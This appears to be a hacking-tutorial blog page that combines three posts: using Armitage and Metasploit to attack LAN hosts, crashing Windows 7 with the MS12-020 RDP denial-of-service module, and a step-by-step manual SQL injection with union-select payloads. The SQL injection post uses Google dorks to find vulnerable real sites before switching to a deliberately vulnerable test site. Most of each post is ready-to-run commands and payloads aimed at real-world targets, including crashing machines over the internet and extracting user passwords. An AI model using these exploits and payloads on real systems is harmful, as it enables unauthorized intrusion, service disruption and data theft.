Now metasploit is not distributed with Kali Linux (it was distributed with backtrack though). However, Kali has it on its repositories, and it can be easily downloaded and installed by executing-

apt-get install armitage

It will check dependencies and download the required file and install Armitage for you.  After its done, you can start armitage by using the following code-

service postgresql start

 service metasploit start

armitage

 You will get a screen like this. Let the settings be as they are, and click connect. You'll get a prompt like this (most of the time)

Now you'll see Armitage making some connection for you. For a short while it might show failure messages (Connection Refused), but after some time Armitage will start.

And you'll end up with a windows somewhat like this

Now while I do believe that the developer has succeeded in making a tool which permits me to say - "I'll take my leave, you can handle stuff from here", but I'd still go on for a while, helping you know some basic stuff before I take my leave.

Armitage Basics

Now the tough coding (honestly there wasn't anything tough about that) that you had to do with Metasploit, becomes as easy as a click on Armitage. Better yet, you can see exactly what line of code is actually executed when you do something with your mouse. As a start, you should do a quick scan with OS detect.

And while it does ask you to enter some stuff now, it is going to be pretty easy, you just have to follow the example given by armitage with some modification.

First do your old ifconfig on a new terminal to find you IP

ifconfig

 Notice that most of the time, the first 6 digits are 192.168. You have to figure out the next 3 digits. After that, you can enter the ip into the armitage window. Look at the sample it had provided, just copy that, and, replacing the 1 with 154 as in my case. You final code should be 192.168.154.0/24. The 0/24 means it'll look at all the IPs from 192.168.154.1 to 192.168.154.256. Actually it scans IP from 192.168.xxx.0 through 192.168.xxx.255. Most of the time, you'll find your host in this range, however, to include all IP from 192.168.0.0 to 192.168.255.255, you may use 192.168.0.0/16.

This is the automatically generated code after clicking OK.

Now, after a few seconds, you will see the following message, and it tells you exactly what you're supposed to do next.

Now a couple of computers with respective OS icons will show up on your screen. As expected, you'll have to go to Attacks -> Find attacks. There's no rocket science here, and I'm not putting any more screenshots. After that, right click on the computer you want to hack, and you'll see an attack option. Select whichever you want to try, enter the requisites (you learnt how to do Information gathering in the previous Metasploit tutorials). Everything will be quite easy, except for the fact that the exploits in attack section will be possible exploits, that might or might not work. If you're expecting a click to hack you a Windows 7 machine, then that's just not happening. It might work with an unpatched XP machine, a ms03_026_dcom might do the trick, or the netapi one. Good luck with playing around with this tool. And here's the official Armitage website (media section link, useful vids and pics there) where you might find some more guidance, though the tool doesn't need any.

Read More

Penetration Testing : Crash Windows 7 Using Metasploit and Remote Desktop Connection Vulnerability

Crashing Windows 7

Now while the story so far has been smooth and cozy, it gets a bit tough from here on. For modern operating systems like Windows 7, there aren't any magical exploits like the ones we had for unpatched Windows XP machines. We had been able to hack Windows XP and try some meterpreter features on the exploited XP machine. However, when it comes to Windows 7, there aren't any direct exploits for gaining access to the machine. We can try some client side attacks, etc. Social engineering toolkit would be great for stuff like that. However, there is still one vulnerability that waits to be exploited. In Windows 7, there is a hole in the RDP port (3389) which can work over LAN as well as over the internet. Over the internet stuff can get a bit tougher, however on the LAN, this should be a piece of cake (if you have successfully followed out pentest tutorials so far).

Requirements

Now you will require an attacker Kali machine, and a victim Windows machine, both running on Virtual machines. Windows 7 should be a fresh install, with no updates, as they can patch the vulnerability, making it unexploitable. Now when you have got all this setup, you can move on to further steps.

Information Gathering

Now we'll have to find out the IP of out victim. This would have been complicated in a real life scenario, but in our case, you just go to Windows 7, open command prompt, and type ipconfig. You should be looking for IPv4 address of Local Area Network.

In our case thats where the information Gathering Stops

Starting Metasploit

Now execute the following commands to start metasploit framework (on recent versions of Kali, run only the third command, skip the first two)

service postgresql start

service metasploit start

msfconsole

So now you have msf console opened up (note my codes will still display root@kali but you don't mind it).

Exploit

Now select the exploit that we are going to be using-

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

Now do a show options, it will tell you that  it only requires two options, RHOST and RPORT. Rport is obviously 3389, the remote desktop port. The RHOST is the one you found out in the information gathering step. The use the following code to set the RHOST

set RHOST 192.168.---.---

Surprising as it may seem, we are done already. Just type

exploit

The target machine will get a Blue Screen Of Death and will reboot. You can do this as many times as you feel like, and in real life scenario, it can be really annoying, considering it can be done over the internet too.

Possible Problems

 If you get an error of this sort, then most probably your Windows 7 machine has firewall enabled, and is blocking your packets. An antivirus could do the same thing. There might be some issues with the LAN connection too. A good diagnosis test would be to ping the machine. Go to a kali terminal and execute

ping 192.168.---.---

After waiting for a while, press ctrl + c which will stop the pinging. Look at the result-

 If you get something like this (0 packets received), then there is absolutely no communication between the Kali and Windows machine (in effect, they are not on the same network, even though they are). That's why the exploit doesn't work.

Something like this means that the connection is just fine, and probably the Windows machine has become immune to the attack due to some patch. (see : https://technet.microsoft.com/en-us/library/security/ms12-020.aspx)
If its the former case, then you'll have to find a way to get the connection working, and if its the latter, then try disabling firewall, antivirus, and maybe setting the network as home instead of public. Then go to advanced sharing settings, and choose all the options that you think will make your computer easier to hack.
If possible, see if you can uninstall installed updates. The final thing to do is to get an early unpatched release of Windows 7. In some cases installing VMware tools might help.

Enable Remote Desktop

In many Windows releases, remote desktop is turned off by default. To enable it, follow these steps-

Go to System (Control Panel\System and Security\System). Click on Remote settings. Select the "Allow Remote Connections to this computer" button. Click ok.

Select the allow option. By default don't allow is selected in many Windows releases.

Read More

Hacking Websites Using SQL Injection Manually

Sql Injection - Hacking Websites

In this post we will hack a website and obtain its data using SQL injection attack. We will not use any tools. This is one of the few tuts on this blog for which you don't need Kali Linux. You can easily carry it out from Windows machine on any normal browser. If you need to get a big picture of what a SQL injection attack actually does, take a look at this tutorial on Basics Of SQL Injection.

SQL Injection

Finding A Vulnerable Website

The first step is obviously finding a vulnerable website. There are a lot of ways to do so. the most common method of searching is by using dorks.

Dorks

Dorks are an input query into a search engine (Google) which attempt to find websites with the given text provided in the dork itself. Basically it helps you to find websites with a specific code in their url which you know is a sign of vulnerability.

A more specific definition could be "Advanced Google searches used to find security loopholes on websites and allow hackers to break in to or disrupt the site." (from 1337mir)

Using Dorks

Now basically what a dork does is uses Google's "inurl" command to return websites which have a specific set of vulnerable words in url. For that, we need to know which words in the url make a website potentially vulnerable to a SQL injection attack. Many websites offer a comprehensive list of google dorks. For example, the l33tmir website has a list of hundreds of google dorks. However, creativity is your best tool when it comes to finding vulnerable sites, and after practicing with some google dorks, you will be able to create your own. A few dorks have been listed below. What you have to do is paste them into the google search bar and google will return potentially vulnerable sites. NOTE: Don't mind the root@kali:~# behind the code. I have implemented this on all the code on my blog, and the majority of it is really on Kali Linux so it makes sense there but not here.

inurl:"products.php?prodID="

inurl:buy.php?category=

What you have to notice here is the structure of the commands. The inurl instructs google to look at the URLs in it's search index and provide us with the ones which have a specific line in them. Inside the inverted commas is the specific URL which we would expect to see in a vulnerable website. All the vulnerable sites will surely have a .php in their URL, since it is an indicator that this website uses SQL database here. After the question mark you will have a ?something= clause. What lies after the = will be our code that is known to cause malfunctioning of databases and carrying out of a Sql Injection attack.
After you have used the dork, you have a list of potentially vulnerable sites. Most of them though, may not be vulnerable (i.e not the way you want them to be, they might still be having some vulnerabilities you don't know about yet). The second step is finding the actually vulnerable sites from a list of possible ones.

Testing sites for vulnerabilities

Now lets assume we used the first dork, i.e. products.php?prodID=. We then came across a site www.site.com/products.php?prodID=25.  Now we have to check if that website is vulnerable or not. This is pretty simple. All you have to do is insert an asterisk ' at the end of the url instead of 25. The url would look somewhat like this www.site.com/products.php?prodID='

If you are lucky, then the site would be vulnerable. If it is, then there would a some kind of error showing up, which would have the words like "Not found","Table","Database","Row","Column","Sql","MysqL" or anything related to a database. In some cases, there would be no error, but there would be some berserk/ unexpected behavior on the page, like a few components not showing up properly, etc.

A typical error message

But right now you only know that the site is vulnerable. You still have to find which colums/rows are vulnerable.

Finding number of columns/rows

Now we need to find the number of columns in the table. For this, we will use trial and error method, and keep executing statements incrementing the number of columns till we get an error message.

www.site.com/products.php?prodID=25+order+by+1

Effectively, we added order by 1 to the end of the original url. If there is atleast one column in the table, then the page will continue to work all right. If not, then an error will be displayed. You can keep increasing the number of columns till you get an error. Lets assume you get an error for

www.site.com/products.php?prodID=25+order+by+6

This means that the page had 5 columns, and the database couldn't handle the query when you asked for the 6th one. So now you know two things

• The site is vulnerable to SQL injection
• It has 5 columns

Now you need to know which of the columns is vulnerable

Finding Vulnerable columns

Now lets assume we are working on our hypothetical site www.site.com which has 5 columns. We now need to find out which of those columns are vulnerable. Vulnerable columns allow us to submit commands and queries to the SQL database through the URL. We now need to find which of the columns is vulnerable. To do this, enter the following into the url

www.site.com/products.php?prodID=25+union+select+1,2,3,4,5

In some cases you might need to put a - behind the 25. The page will now load properly, except for a number showing up somewhere. This is the vulnerable column. Note it down.

Let's say the page refreshes and displays a 2 on the page, thus 2 being the vulnerable column for us to inject into.

Now we know which column is vulnerable. Next part is obtaining the SQL version, since the remaining tutorial will vary depending on which version of SQL is being used. 

Unification

From here on, the things will get tough if you are not able to follow what I'm doing. So, we will unify under a single website. This website is intentionally vulnerable to SQL injection, and will prove highly useful since we will be doing the same thing. The purpose of introducing this site at a later stage was to give you an idea how to find vulnerable sites yourself and also find the vulnerable columns. This is what will prove useful in real life. However, to make what follows comparatively easier, we all will now hack the same website. The website is

http://testphp.vulnweb.com/

The actual vulnerability is here

http://testphp.vulnweb.com/listproducts.php?cat=1

Notice that the URL has the structure that you now know well. If used properly, a google dork could have led us to this site as well. Now we will replace the 1 with an asterisk '

This is what you vulnerable page looks like to start with

As you can guess, it is vulnerable to SQL injection attack

Now we need to find the number of columns.

10 columns. Nothing so far.

12 columns. Error....

So if there was an error on 12th columns. This means there were 11 columns total. So to find the vulnerable column, we have to execute -

http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11

This does not return any error. As I said before, adding a minus sign (-) after = and before 1 will help.

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11 

Now we can see total four numbers on the page. 11,7,2 and 9. It won't be hard to figure out which of them depicts the vulnerable column

You can take a look at the page http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11 (no minus sign that is). Now scroll down to the bottom. You will see this-

Comparing the pic with and without the error, we can easily say that the unexpected element in the malfunctioned page is the number 11. We can conclude that 11th column is the vulnerable one. These kind of deductions make hacking very interesting and remind you it's more about logic and creativity than it's about learning up useless code.
Now we are finally where we left out before we changed our stream. We need to find the sql version. It can sometimes be very tricky. But lets hope its not in this case.
Now get the code that told you about the vulnerable column and replace the vulnerable column (i.e. 11) with @@version. The url will look like this.

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version

Now finally you'll see something like

The server is using Sql version 5.1.69, most probably MySQL (pretty common). Also we know the OS is Ubuntu.
And the thing I said about it being tricky sometimes. Sometimes the server does not understand the @@version command directly and you need to convert it. You will need to replace @@version with convert(@@version using latin1) or unhex(hex(@@version)).
Now the information gathering part is complete. We have to move to actual download of tables. Just write down all you know about their database, table and server. You must have a real sense of accomplishment if you have followed the tutorial so far. The boring part always requires maximum motivation and determination.

Extracting tables from SQL database

Now the method to extract data is different depending on the version . Luckily its easier for version 5, and that's what you'll come across most of the time, as is the case this time. All the data regarding the structure of the table is present in the information schema. This is what we're gonna look at first.

In our query which we used to find vulnerable columns (i.e. testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11), we will replace the vulnerable column with table_name and add prefix +from+information_schema.tables. The final url will be

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name+from+information_schema.tables

 As you can see, the name of the table is character_sets. However, this is just one table. We can replace the table_name with group_concat(table_name) to get all tables

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables

 We now have the names of all the tables. Here it is - CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVIL
As you see, the ending of the last table is incomplete. To correct this, you can modify the end of the url to something like +from+information_schema.tables+where+table_schema=database()

Obtaining columns

It is similar to obtaining tables, other than the fact that we will use informaiton_schema.columns instead of informaiton_schema.tables, and get multiple columns instead of just one using the same group concat. We will also have to specify which table to use in hex. We will use the table events (I've highlighted it above too). In hex it's code is 4556454e5453 (You can use text to hex convertor - also prefix 0x behind the code before entering it). The final code will be-

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema.columns+where+table_name=0x4556454e5453

We now know the columns of the table events

Extracting data from columns

We will follow the same pattern as we did so far. We had replaced the vulnerable column (i.e. 11) with table_name first, and then column_name. Now we will replace it with the column we want to obtain data from. Lets assume we want the data from the first column in the above pic, ie. event_catalog. We will put the fol. URL-

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,EVENT_CATALOG+from+information_schema.EVENTS 

The page didn't display properly, this means that the our query was fine. The lack of any data is due to the fact that the table was actually empty. We have to work with some other table now. Don't let this failure demotivate you. 

However, our luck has finally betrayed us, and all this time we have been wasting our time on an empty table. So we'll have to look at some other table now, and then look at what columns does the table have. So, I looked at the first table in the list, CHARACTER_SETS and the first column CHARACTER_SET_NAME. Now finally we have the final code as-

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME)+from+information_schema.CHARACTER_SETS

This table has a lot of data, and we have all the character_sets name.

So finally now you have data from CHARACTER_SET_NAME column from CHARACTER_SETS table . In a similar manner you can go through other tables and columns. It will be definitely more interesting to look through a table whose name sounds like 'USERS' and the columns have name 'USERNAME' and 'PASSWORD'.  I would show you how to organize results in a slightly better way and display multiple columns at once. This query will return you the data from 4 columns, seperated by a colon (:) whose hex code is 0x3a.

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME,0x3a,DEFAULT_COLLATE_NAME,0x3a,DESCRIPTION,0x3a,MAXLEN)+from+information_schema.CHARACTER_SETS

Finally you have successfully conducted an sql injection attack in the hardest possible way without using any tools at all. We will soon be discussing some tools which make the whole process a whole lot easier. However, it is pointless to use tools if you don't know what they actually do.
Alright, the tutorial on automated Sql injection is finally here. Take a look

Sql Injection Using sqlmap in kali linux

Read More